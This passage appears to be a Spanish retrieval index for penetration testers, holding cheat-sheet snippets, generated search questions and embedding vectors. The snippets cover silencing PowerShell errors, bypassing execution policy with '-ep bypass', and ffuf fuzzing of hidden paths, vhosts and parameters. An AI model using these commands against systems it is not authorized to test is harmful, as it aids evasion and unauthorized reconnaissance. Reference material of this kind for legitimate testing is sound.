-0.00164, -0.05614, 0.02301, -0.01568, 0.01768, -0.01228, -0.02492, 0.06731, -0.02794, -0.00453, -0.02804, 0.01115, 0.04217, 0.02332, 0.04141, 0.07857, -0.00404, -0.0359, -0.00973, -0.07442, 0.00207, -0.07095, 0.03304, -0.06776, 0.02797, -0.01203, -0.06176, -0.02316, -0.05246, -0.02451, 0.06659, 0.01454, 0.00504, 0.0501, -0.08113, 0.01964, 0.09606, 0.01394, 0.08593, -0.03182, 0.00175, -0.01009, 0.06962, 0.01501, 0.01373, 0.0693, -0.0187, 0.01258, -0.03122, -0.00799, -0.01308, -0.00012, 0.05414, -0.02085, -0.072, 0.05677, -0.03223, 0.06511, -0.00951, -0.0048, 0.01, 0.04681, -0.0886, -0.01222, -0.00965, -0.08193, 0.03404, 0.07651, 0.00502, 0.02088, -0.04212, 0.03638, -0.04601, -0.02912, -0.04215, -0.06826, -0.02474, 0.02142, -0.01209, -0.01479, 0.02916, -0.06987]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "que herramientas bash sirven para ejecutar scripts sin errores ni advertencias", "v": [0.20785, 0.01895, -0.05581, -0.20357, 0.06708, -0.09443, -0.09784, -0.06697, 0.04091, 0.0125, -0.14379, 0.01689, -0.02405, -0.09075, 0.10033, 0.04379, -0.0512, 0.01485, 0.08862, -0.02108, 0.06841, 0.02481, 0.0648, 0.04261, -0.10954, -0.01164, -0.07379, 0.02893, -0.2287, -0.00453, -0.08928, 0.02987, 0.12631, -0.02886, -0.02961, 0.1035, -0.1568, -0.01093, 0.00562, 0.22948, 0.02787, 0.11662, -0.12718, 0.0205, 0.04871, -0.13192, 0.06063, 0.03614, 0.03325, -0.00252, 0.05803, -0.11525, -0.08211, 0.02792, -0.01091, -0.00764, 0.11763, -0.15035, -0.10803, -0.06036, -0.07513, -0.09565, 0.02244, 0.00129, 0.01393, 0.06712, -0.02296, -0.14044, -0.05021, 0.07448, -0.00439, -0.00683, 0.00529, 0.09055, 0.01857, -0.08644, -0.07884, -0.00059, -0.00845, 0.01427, -0.0675, -0.07625, 0.01623, -0.01017, 0.00262, -0.1248, -0.11706, -0.04443, -0.06821, -0.11146, 0.10059, 0.06773, 0.00277, 0.00908, 0.08055, -0.02251, 0.1305, -0.05473, 0.02509, 0.07392, 0.02708, -0.13261, -0.02661, 0.09503, -0.03714, 0.08927, 0.02866, 0.04189, 0.02657, -0.04604, 0.0237, 0.03579, 0.02799, -0.00127, 0.03639, 0.01265, -0.01124, -0.06033, -0.00898, -0.0409, 0.03624, -0.07072, -0.1057, -0.01811, -0.03325, -0.02817, -0.02197, 0.04476, -0.00119, -0.02416, -0.05235, -0.0602, -0.0028, -0.03637, -0.00799, 0.10272, 0.06255, -0.01911, -0.09841, -0.08325, 0.06103, 0.024, -0.01708, 0.02676, 0.01632, 0.03055, 0.00185, -0.07457, -0.00959, -0.02757, 0.02179, 0.00751, -0.01569, 0.03, 0.01871, -0.10223, 0.00338, 0.03075, -0.02432, -0.0167, 0.0349, -0.03355, -0.01389, 0.08003, 0.05509, -0.03472, -0.00347, 0.11088, 0.01252, 0.09738, 0.01648, 0.06222, 0.0719, -0.0779, 0.03789, -0.05425, -0.0497, -0.00154, -0.02741, -0.01821, 0.02331, -0.06, -0.06397, 0.03344, 0.05527, 0.00039, 0.04916, -0.00154, 0.00783, 0.05757, -0.0531, 0.01754, -0.05914, -0.06075, 0.00843, 0.07284, 0.01311, 0.0065, -0.03141, 0.00614, -0.02992, 0.07974, -0.017, -0.02576, 0.08843, 0.0456, -0.03114, -0.03077, -0.07033, 0.01536, 0.03099, -0.00302, 0.00166, -0.0556, -0.03583, -0.06024, 0.03608, 0.06352, -0.01605, 0.00712, -0.04194, -0.01746, 0.02587, -0.06623, -0.04916, -0.0096, 0.02993, -0.04966, -0.01299, 0.01187, 0.00793, -0.03399, -0.06882, -0.00065, -0.02211, -0.08369, 0.00347, -0.00143, -0.00982, -0.0733, -0.01986, 0.01304, 0.00358, -0.05576, 0.01363, -0.01495, -0.01311, -0.06858, -0.00847, 0.01142, 0.00733, -0.00465, 0.02739, -0.03325, -0.02059, -0.05768]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "como puedo correr un script powershell sin que se bloquee la ejecuciΓ³n", "v": [-0.00839, -0.04006, -0.13041, -0.16974, -0.0546, -0.10379, 0.0374, 0.04418, 0.02887, -0.11034, -0.03305, -0.0077, 0.04445, -0.03254, 0.04484, -0.06679, -0.11377, 0.01054, -0.05029, -0.10292, -0.00275, -0.12411, 0.05146, -0.02614, 0.0636, 0.06878, -0.07582, 0.17582, -0.0858, -0.20475, -0.07535, 0.05039, 0.20692, -0.07966, 0.08328, 0.01361, -0.03481, 0.01338, 0.1021, 0.12371, -0.11463, 0.01845, -0.08112, 0.07705, -0.01932, -0.01641, 0.14324, 0.03117, 0.09905, -0.11755, 0.03226, -0.01273, -0.05375, 0.03792, 0.05704, 0.08568, 0.13524, -0.02282, -0.04723, 0.0624, -0.11667, -0.03009, 0.03148, -0.01815, 0.04591, 0.08828, 0.02378, -0.12602, -0.04191, -0.02297, -0.0049, -0.02082, -0.14623, 0.069, 0.01063, -0.0403, -0.09216, 0.01135, -0.03062, 0.08258, -0.04838, -0.06994, 0.01373, 0.06746, -0.05329, -0.031, -0.10394, -0.05897, 0.0389, -0.0177, 0.05637, 0.00515, -0.04199, 0.01966, -0.05725, 0.01028, 0.09237, 0.10471, 0.00911, 0.03063, -0.06616, 0.011, -0.07774, 0.08284, 0.05148, 0.00558, 0.01665, -0.00933, 0.08444, -0.02098, -0.1037, -0.0298, -0.07339, -0.05291, -0.02326, -0.0088, -0.10995, -0.09186, -0.00935, -0.06921, -0.09725, -0.00394, -0.0987, -0.04528, -0.00805, -0.0615, 0.00571, -0.01597, 0.0429, 0.05852, -0.05021, 0.06301, -0.05067, -0.10038, -0.09831, 0.09812, -0.01312, 0.07696, 0.02582, -0.04329, 0.13998, -0.02687, 0.01992, 0.05207, -0.06723, -0.06917, -0.06667, -0.03486, -0.06787, -0.00132, 0.0606, -0.05082, -0.07702, 0.03368, -0.02787, -0.12585, -0.02764, -0.00532, 0.0106, 0.03208, -0.08274, 0.04134, -0.08807, 0.06045, -0.03934, -0.00737, -0.01754, -0.00345, -0.0334, 0.04956, -0.02488, 0.06671, 0.04537, -0.03232, 0.02494, -0.11667, 0.07474, -0.01023, 2e-05, -0.01312, -0.00844, -0.00325, -0.00569, 0.00909, -0.03597, 0.0138, 0.02013, -0.01943, -0.05354, 0.04296, 0.04241, 0.06512, 0.01302, -0.14339, -0.02032, 0.00161, -0.017, -0.00089, 0.04591, -0.05778, -0.13156, 0.02365, 0.04716, -0.01137, 0.0449, 0.0257, -0.03401, 0.06631, 0.01802, 0.00608, 0.08233, -0.03452, 0.00672, 0.00624, 0.00886, -0.00404, 0.05387, 0.02765, -0.04107, -0.05961, 0.03024, 0.03865, 0.01198, 0.07889, 0.01186, -0.03774, 0.01133, -0.00099, 0.05304, 0.02027, -0.06553, 0.01004, -0.027, 0.06045, 0.02126, 0.04431, -0.03431, 0.00496, -0.00984, -0.00148, -0.03186, 0.04716, -0.02996, -0.07383, -0.07529, 0.03907, -0.04981, 0.02143, -0.01873, -0.0351, -0.00023, 0.01751, -0.00306, 0.01719, 0.03119, 0.04585]} -{"tipo": "pregunta", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacΓ­a). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) Β· `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash Β· Port scanner PowerShell Β· OSCP MOC", "indexar": "quΓ© herramienta sirve para hacer port scanning con powershell", "v": [0.14574, 0.0062, -0.1951, -0.16264, 0.05163, -0.17932, 0.01365, -0.12819, 0.0417, -0.05678, -0.08871, 0.05777, 0.00775, -0.14813, -0.02247, 0.06827, -0.00293, -0.07136, -0.01964, 0.09213, -0.01746, 0.00877, -0.09474, -0.07122, 0.01614, 0.03574, 0.02337, 0.03363, -0.16937, 0.03744, -0.05362, 0.01986, 0.10109, -0.07597, -0.08408, -0.09741, -0.00274, 0.04783, 0.07102, 0.20762, -0.05039, 0.11997, -0.12364, 0.07125, 0.06015, -0.02006, -0.00933, -0.02969, 8e-05, 0.06399, -0.11594, -0.13221, -0.06939, 0.11776, 0.03857, -0.09419, 0.11666, -0.07934, 0.06531, -0.13979, -0.15337, 0.07453, -0.07746, -0.05339, -0.0014, -0.0435, -0.01823, -0.08244, -0.12574, 0.01646, -0.11928, 0.02858, 0.02928, 0.00291, -0.04649, -0.07493, -0.02291, 0.08581, 0.0979, -0.01079, 0.03191, -0.04067, -0.09142, -0.04742, -0.09701, -0.10152, -0.00956, 0.0147, -0.00786, -0.07871, -0.06063, -0.03388, -0.0122, 0.08615, 0.02886, 0.04907, 0.03652, -0.04341, 0.00738, 0.03491, 0.14265, -0.10614, -0.1464, 0.10691, 0.00096, -0.03807, -0.07857, -0.04743, -0.06222, 0.00478, 0.02652, 0.01212, 0.00202, -0.04314, -0.04621, -0.00738, -0.04041, -0.11219, -0.00094, -0.03006, 0.03182, -0.0161, -0.01843, 0.02727, -0.0234, -0.01742, -0.01558, 0.13802, 0.00817, -0.03565, 0.02562, -0.03599, -0.09122, -0.01381, -0.04687, -0.06609, -0.00395, -0.16368, -0.00706, -0.03037, 0.00545, 0.06773, -0.04563, -0.03852, 0.04772, -0.01983, 0.04588, 0.00862, -0.06198, -0.00495, 0.04114, -0.02226, -0.02352, 0.0585, 0.00325, -0.04279, 0.01122, -0.03019, -0.08124, 0.00807, -0.0594, -0.03261, 0.019, 0.04658, 0.01835, -0.02081, -0.03895, -0.00476, 0.06336, -0.0001, 0.0106, 0.07779, -0.00899, -0.07346, 0.01664, -0.05561, 0.00674, 0.01085, 0.00886, -0.10481, 0.00739, 0.03086, 0.01026, -0.001, 0.03801, -0.02838, 0.03486, -0.0879, 0.00177, 0.01725, 0.02031, 0.07577, -0.02587, -0.07326, 0.02244, -0.00393, -0.00343, -0.04454, 0.06678, -0.06647, -0.03457, -0.00953, 0.01716, -0.06502, 0.04719, 0.09453, -0.06625, 0.00653, -0.02738, 0.01941, -0.01259, 0.00635, 0.04774, 0.01165, -0.05138, -0.01223, 0.02743, 0.01145, -0.04448, 0.00132, -0.00713, -0.02267, 0.03474, 0.03687, 0.0264, 0.02834, 0.04826, 0.01675, 0.05242, 0.01704, 0.03146, 0.06569, -0.02721, -0.03934, 0.01248, -0.02256, 0.0086, -0.00754, -0.03069, -0.07481, 0.00793, -0.00085, 0.00272, -0.00594, -0.04893, -0.0547, 0.00378, 0.02372, 0.01884, -0.07897, -0.06235, 0.01938, 0.08786, -0.0199, 0.01206, -0.02874]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "que comando puedo usar para escanear una IP sin man page?", "v": [-0.08506, -0.001, -0.24187, -0.08686, 0.00938, -0.25133, -0.03042, -0.08168, -0.15057, 0.06268, -0.05233, -0.03457, -0.00818, -0.12788, -0.10391, 0.09028, 0.0817, 0.03604, 0.07295, -0.09656, 0.00679, 0.11059, -0.0058, -0.00227, -0.04981, 0.16043, -0.02244, 0.04231, -0.1372, -0.17325, -0.19843, 0.06716, 0.04299, -0.03444, -0.15073, -0.09103, 0.02809, 0.01638, 0.00567, 0.18271, -0.08054, 0.01261, -0.17608, -0.0208, 0.005, 0.04053, 0.07084, -0.01447, 0.06462, 0.01672, -0.10824, -0.12501, -0.02715, 0.04137, -0.09815, 0.00975, 0.1242, -0.04042, 0.04057, -0.0054, -0.067, -0.00072, -0.0134, 0.04548, -0.07853, -0.01135, -0.09449, -0.03357, -0.0247, -0.02604, -0.03147, 0.07219, -0.08565, 0.07487, 0.08289, -0.06035, -0.02259, -0.04556, 0.11842, 0.02749, -0.01777, 0.07556, -0.13895, 0.00473, -0.12736, -0.07065, 0.05702, -0.14649, 0.05265, -0.06478, -0.01931, 0.02595, 0.02462, -0.02541, 0.03931, 0.00559, 0.03, 0.1142, 0.03884, -0.04409, 0.0326, -0.0297, -0.1004, 0.10786, 0.10366, 0.0638, 0.11597, -0.01847, 0.0116, 0.0599, -0.04147, -0.02417, -0.04818, -0.02763, -0.08138, -0.0029, -0.02333, -0.05997, -0.01461, -0.07601, -0.05973, -0.04562, -0.00567, 0.05208, 0.0662, 0.02242, 0.016, 0.03832, 0.02274, 0.01662, -0.02501, -0.02985, 0.01434, -0.06456, 0.02355, 0.07095, -0.01202, -0.01921, -0.04648, -0.00904, 0.02684, 0.03149, -0.07142, 0.0175, 0.03925, -0.05198, 0.0139, -0.07286, -0.00854, -0.04044, 0.07424, 0.03285, -0.0667, 0.04521, -0.04029, 0.0055, 0.04973, -0.00061, 0.00703, 0.00944, -0.093, -0.02583, 0.02594, 0.05032, 0.04113, -0.03076, -0.06378, -0.02077, -0.02241, 0.01181, 0.02266, 0.07702, -0.00778, -0.0563, 0.0194, -0.08276, 0.01217, 0.00583, -0.01465, 0.03424, 0.03174, -0.01483, -0.0216, -0.03879, 0.03374, 0.01253, 0.0239, -0.01417, -0.0458, 0.03831, 0.0249, 0.05971, 0.01357, 0.002, -0.00616, -0.01586, 0.04045, -0.01834, -0.02435, -0.08576, -0.02541, 0.02001, -0.01854, -0.03404, 0.04916, -0.094, -0.01219, 0.0083, 0.05714, -0.02421, -0.00721, -0.04209, 0.04582, -0.04388, -0.06316, -0.00477, 0.04082, 0.02863, -0.02929, -0.04447, 0.04664, 0.02236, -0.01823, 0.02039, 0.01419, 0.03092, -0.06161, -0.06123, 0.03395, 0.00498, -0.04867, 0.00746, -0.04725, -0.01707, 0.00903, -0.02358, -0.00827, 0.01774, 0.00018, -0.01325, -0.03843, 0.04459, -0.04978, -0.02675, -0.03931, -0.05765, -0.09624, 0.02131, -0.04747, -0.02477, -0.00592, 0.00886, -0.00012, -0.01391, -0.02689, 0.02778]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "cual es una referencia densa de comandos de pentesting?", "v": [0.179, 0.00476, -0.03356, 0.0651, 0.06329, -0.03929, 0.04727, -0.13896, -0.12243, 0.00668, -0.12319, 0.07876, -0.10374, -0.19143, 0.00055, 0.11453, 0.06888, 0.04078, 0.07426, -0.15799, -0.01391, -0.16919, -0.01684, 0.04438, -0.07626, 0.05934, 0.14893, 0.01151, -0.02609, 0.03433, -0.00875, 0.00182, 0.00437, -0.04749, -0.06, 0.01965, -0.14143, 0.00127, 0.03676, 0.19913, -0.11139, -0.00661, -0.17618, 0.03189, -0.09837, -0.09438, -0.01024, 0.11762, 0.02032, -0.07671, -0.03767, -0.02367, -0.04059, 0.00929, -0.04111, -0.02902, 0.18814, 0.00903, 0.0116, -0.04283, 0.01343, -0.06164, -0.05953, 0.05863, 0.03762, -0.14183, -0.01547, -0.14614, -0.00809, 0.01176, -0.05038, 0.07424, 0.02749, 0.03949, 0.08839, 0.00281, -0.05656, 0.03852, 0.10092, -0.00182, -0.03586, 0.01163, -0.09564, 0.06544, -0.05772, -0.13928, -0.01406, -0.03262, -0.01497, -0.04656, -0.05021, -0.00092, 0.00857, 0.04682, 0.01476, 0.01309, -0.05659, 0.10452, 0.1164, 0.05709, 0.0005, 0.08249, -0.04525, 0.1611, 0.09474, -0.02114, -0.00149, -0.07461, 0.03568, -0.08009, 0.07074, -0.07372, -0.03155, -0.02754, -0.05339, -0.11845, -0.0538, -0.04499, 0.0145, -0.07811, -0.09815, 0.03495, 0.03799, 0.05877, -0.01973, -0.01774, 0.00582, 0.02509, 0.03596, 0.08631, 0.00183, -0.02515, 0.08696, -0.11127, -0.00457, 0.04703, 0.02448, 0.0243, -0.09494, -0.08507, -0.00532, 0.05701, 0.04677, 0.01094, 0.07718, -0.01389, -0.00675, -0.05092, -0.07166, -0.0092, -0.00453, 0.07121, -0.03975, 0.03885, -0.00079, 0.01794, -0.0096, 0.03815, -0.03866, 0.00494, -0.0245, 0.01378, 0.02544, 0.01724, 0.0199, -0.04324, 0.00522, -0.04353, 0.01455, -0.0731, 0.03143, -0.05165, -0.05336, 0.01437, 0.00756, -0.09443, -0.06481, -0.01112, -0.01232, 0.04608, -0.00183, 0.02692, -0.05957, -0.02233, 0.0209, -0.09339, 0.02204, 0.00781, 0.05196, 0.00172, 0.00634, 0.00442, -0.05522, -0.05864, 0.01545, -0.06267, 0.01852, -0.0495, -0.0878, -0.07506, -0.081, 0.01909, -0.00255, -0.06414, 0.08216, 0.01653, -0.05768, 0.0615, -0.03462, 0.0465, 0.04464, -0.02437, 0.04434, -0.01065, -0.0267, -0.01424, 0.00673, -0.03366, 0.00329, -0.02626, 0.01148, 0.01027, 0.07977, -0.00874, -0.00859, 0.00242, 0.03071, -0.00682, 0.04401, 0.0105, -0.0171, 0.02123, -0.07199, -0.0644, 0.04287, 0.05746, 0.01355, -0.00055, 0.00283, 0.00359, 0.02914, 0.04332, -0.01533, -0.07667, -0.00996, -0.03976, -0.12829, 0.02448, -0.05902, -0.0136, 0.03283, -0.01433, 0.02148, -0.07835, 0.04547, -0.05247]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "indexar": "con que herramienta puedo hacer invocations de penttesting rapido?", "v": [-0.06336, 0.04159, -0.32862, -0.17279, 0.15987, -0.0399, 0.02216, -0.05884, -0.09817, -0.11061, 0.04833, 0.11481, 0.01274, -0.10303, -0.02614, 0.21098, 0.00237, 0.03007, 0.10372, -0.05832, -0.06269, -0.02095, -0.11598, -0.00397, -0.07068, 0.06852, -0.00307, 0.0998, -0.1227, 0.00459, -0.08284, 0.01032, -0.02577, -0.01218, -0.16359, -0.02761, 0.01508, 0.09628, 0.02179, 0.1751, -0.12849, 0.09393, -0.06398, 0.02413, 0.02695, 0.01256, -0.02645, 0.0466, -0.08359, 0.08559, -0.05607, -0.18226, -0.07208, -0.02674, -0.02373, -0.0983, 0.15387, -0.17231, 0.05965, -0.09483, -0.01848, -0.02212, -0.10727, -0.02167, 0.02132, 0.02692, -0.00698, -0.08341, 0.02854, 0.09516, -0.09799, -0.02967, 0.04495, -0.01968, 0.04154, -0.03307, -0.05495, -0.08674, 0.01432, 0.00472, -0.05872, -0.01996, -0.07705, -0.04415, -0.04212, -0.08024, 0.06279, -0.02919, 0.07553, -0.07641, -0.00457, 0.05408, 0.05608, 0.02531, 0.03801, 0.07019, -0.04104, -0.00783, 0.03404, -0.03469, 0.11348, -0.06173, -0.08184, -0.02432, -0.00484, -0.03365, -0.03892, 0.02507, -0.05954, -0.03268, 0.04775, 0.06839, -0.01751, -0.03492, -0.006, 0.05273, -0.09449, -0.06741, -0.04997, -0.00062, 0.03518, 0.00353, -0.04686, 0.00998, 0.06641, -0.03917, -0.01766, 0.06586, 0.04609, -0.10341, 0.02763, -0.04288, -0.08606, -0.05405, -0.00217, -0.01299, 0.04158, -0.09498, 0.05332, -0.04542, 0.00171, 0.08522, -0.03266, -0.12873, -0.00287, 0.04705, -0.03938, -0.07655, 0.02119, -0.04573, -0.01779, 0.01947, -0.01396, 0.01882, 0.01655, -0.04775, 0.01344, 0.03985, -0.03922, -0.01657, -0.09726, -0.04427, 0.06069, 0.01591, -0.03525, -0.01833, 0.05118, -0.0337, 0.01641, -0.01393, 0.02001, -0.00526, 0.03039, -0.05516, 0.04288, 0.0108, -0.05856, -0.01002, -0.01254, -0.10379, -0.04988, -0.00134, -0.05725, -0.07473, -0.02801, -0.01818, 0.03049, 0.00432, 0.05701, 0.02672, 0.03402, 0.06938, 0.00264, -0.02208, 0.00922, 0.0164, 0.0257, -0.01542, 0.0116, 0.01035, -0.07937, -0.02223, 0.00591, -0.06829, 0.02457, 0.07404, -0.02803, 0.03095, -0.00811, 0.01292, 0.03397, 0.02481, 0.05227, -0.05727, 0.00653, 0.02192, 0.05634, -0.02294, -0.07583, -0.01365, 0.02022, 0.03566, 0.03372, 0.05756, -0.0213, 0.04962, 0.0011, -0.01186, 0.01879, 0.02281, 0.01518, -0.06229, -0.02402, -0.07286, 0.01462, -0.01584, 0.03471, -0.02702, -0.03392, -0.02082, -0.00804, 0.02904, 0.03264, 0.01494, -0.02445, -0.03569, 0.00697, -0.0442, -0.00189, -0.084, -0.01829, -0.0083, 0.07229, -0.04459, 0.00678, -0.04549]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "indexar": "quΓ© herramienta me ayuda a probar diferentes URLs para encontrar rutas ocultas?", "v": [0.10467, 0.08132, -0.22968, -0.13428, 0.02514, 0.00672, -0.07244, -0.02154, -0.01822, -0.07325, -0.13534, -0.14112, 0.10895, -0.02627, 0.00676, -0.11637, 0.0281, -0.03272, 0.01586, -0.04641, 0.01771, -0.084, -0.1548, -0.01626, -0.14442, -0.08737, 0.13853, -0.02437, -0.05911, -0.0521, 0.01104, 0.06598, -0.03165, -0.0183, -0.22187, 0.01187, 0.05184, -0.0554, 0.06382, -0.03176, 0.02502, -0.03709, -0.02872, 0.05658, 0.02655, 0.03044, -0.12615, 0.00341, -0.07203, 0.02989, -0.07393, -0.23096, -0.13887, -0.08341, 0.01545, -0.18796, 0.14605, -0.099, 0.00624, -0.06348, -0.03337, -0.03534, -0.02851, 0.06507, 0.02778, -0.04155, -0.01438, -0.07668, -0.1138, 0.02722, -0.05674, 0.03925, 0.04377, -0.00615, -0.05932, -0.00317, 0.04745, 0.01348, 0.077, -0.01518, 0.081, 0.0842, -0.07074, 0.10907, -0.02915, -0.05548, 0.01576, 0.03075, -0.03792, -0.11479, 0.01463, -0.00666, -0.04233, 0.04694, -0.01695, -0.00811, 0.06568, -0.06724, 0.03299, -0.0381, 0.0353, -0.12255, -0.15024, 0.05898, -0.06013, 0.03595, -0.07271, -0.02555, -0.11803, 0.07685, 0.08649, -0.00071, -0.0376, -0.01872, 0.01161, 0.06478, -0.00164, -0.06728, -0.06471, -0.13717, 0.00133, 0.0538, -0.12828, 0.06025, -0.00063, 0.00713, -0.02421, 0.07675, 0.05103, -0.06146, -0.03176, -0.07659, -0.06229, -0.00969, -0.00419, 0.03656, 0.08295, -0.07942, -0.04236, 0.00775, 0.03019, -0.03199, -0.047, -0.11341, 0.0268, -0.018, -0.00429, 0.00103, -0.01833, 0.0391, -0.01071, -0.00551, 0.07781, 0.00606, -0.01398, 0.01448, 0.00649, -0.0539, -0.06657, 0.04077, -0.03017, 0.02981, -0.03305, -0.06581, 0.02795, -0.05956, -0.02007, -0.00524, 0.01945, -0.02015, 0.03283, 0.0674, 0.02775, -0.06067, -0.02094, -0.0761, -0.0321, -0.04734, 0.01567, -0.04204, -0.03907, 0.01128, 0.01901, -0.02762, 0.05434, -0.06687, 0.0756, -0.07393, -0.00256, 0.0398, 0.02399, -0.00653, -0.00391, -0.03439, -0.00321, 0.02361, 0.06171, -0.06983, 0.00699, -0.04277, -0.04705, -0.02794, -0.03347, -0.08447, -0.0127, 0.03633, -0.0546, -0.03155, -0.03083, -0.00943, 0.11898, 0.00856, 0.07802, -0.05114, 0.00734, -0.00517, -0.04537, 0.00857, -0.04241, -0.02423, 0.00052, 0.00567, 0.03951, 0.00801, 0.04169, 0.05611, 0.0179, 0.04643, -0.03316, -0.00445, 0.04694, -0.026, -0.03751, -0.00118, 0.01803, -0.04438, 0.01763, -0.00413, -0.02898, 0.00322, 0.00623, 0.0477, 0.03196, -0.02412, -0.04674, -0.07146, -0.02145, -0.00484, -0.0506, -0.05668, -0.03342, 0.01474, 0.06951, -0.0459, 0.04779, -0.06492]} -{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "indexar": "con quΓ© programa puedo buscar archivos o pΓ‘ginas que devuelven cΓ³digos de estado especΓ­ficos como 301, 401 o 404?", "v": [0.13792, -0.00381, 0.04501, -0.08024, 0.02445, -0.20367, 0.0708, -0.12628, -0.05511, -0.0928, -0.07418, -0.13959, -0.0624, -0.15506, 0.07846, 0.02618, 0.06923, -0.02687, 0.07937, -0.02504, -0.00127, -0.06593, -0.0408, -0.08294, -0.07002, 0.00271, 0.02316, 0.01115, -0.14438, 0.00574, 0.02808, 0.01881, 0.01835, -0.0396, -0.12833, 0.07804, 0.09504, 0.20578, -0.14976, 0.09255, -0.04298, 0.08456, -0.08393, 0.07627, 0.03719, -0.06416, 0.01339, 0.04428, -0.03149, -0.03766, -0.15091, 0.01298, -0.09676, -0.0062, -0.0406, -0.04296, 0.03084, -0.0151, 0.02221, 0.03209, -0.01884, 0.02338, -0.02471, -0.05278, -0.00827, 0.0246, 0.15147, 0.04391, -0.07212, 0.05946, 0.00758, 0.0591, -0.02948, -0.10171, 0.0407, 0.08333, 0.04312, -0.04078, 0.01877, -0.06048, 0.02381, 0.00793, -0.06612, 0.02585, -0.08348, -0.0222, -0.08319, -0.01895, -0.05127, -0.12367, 0.07905, 0.01763, -0.06058, 0.04591, -0.10042, -0.01036, 0.10451, 0.0897, 0.0526, 0.04579, -0.02889, -0.06766, -0.00349, 0.12572, 0.08472, 0.04628, 0.05173, -0.00469, 0.04838, 0.0344, -0.02957, -0.0357, -0.02912, -0.0274, -0.08191, 6e-05, -0.00281, -0.00937, 0.08291, -0.06817, -0.14832, 0.09132, -0.07535, 0.11915, 0.08022, 0.02982, 0.04859, 0.06561, -0.02958, -0.01641, 0.03982, 0.04086, 0.00505, 0.0219, -0.06027, 0.02229, 0.10229, 0.04045, 0.0226, 0.00869, 0.07611, 0.00915, 0.0543, 0.00968, 0.04383, 0.03197, 0.01757, 0.01757, -0.06214, -0.10395, 0.02367, 0.03977, -0.01663, -0.00194, -0.02649, 0.02329, -0.00277, -0.0825, -0.02219, -0.02207, -0.06893, 0.0843, -0.009, -0.03258, 0.05479, 0.03635, -0.05663, -0.01091, 0.06787, 0.00843, -0.06007, 0.01036, 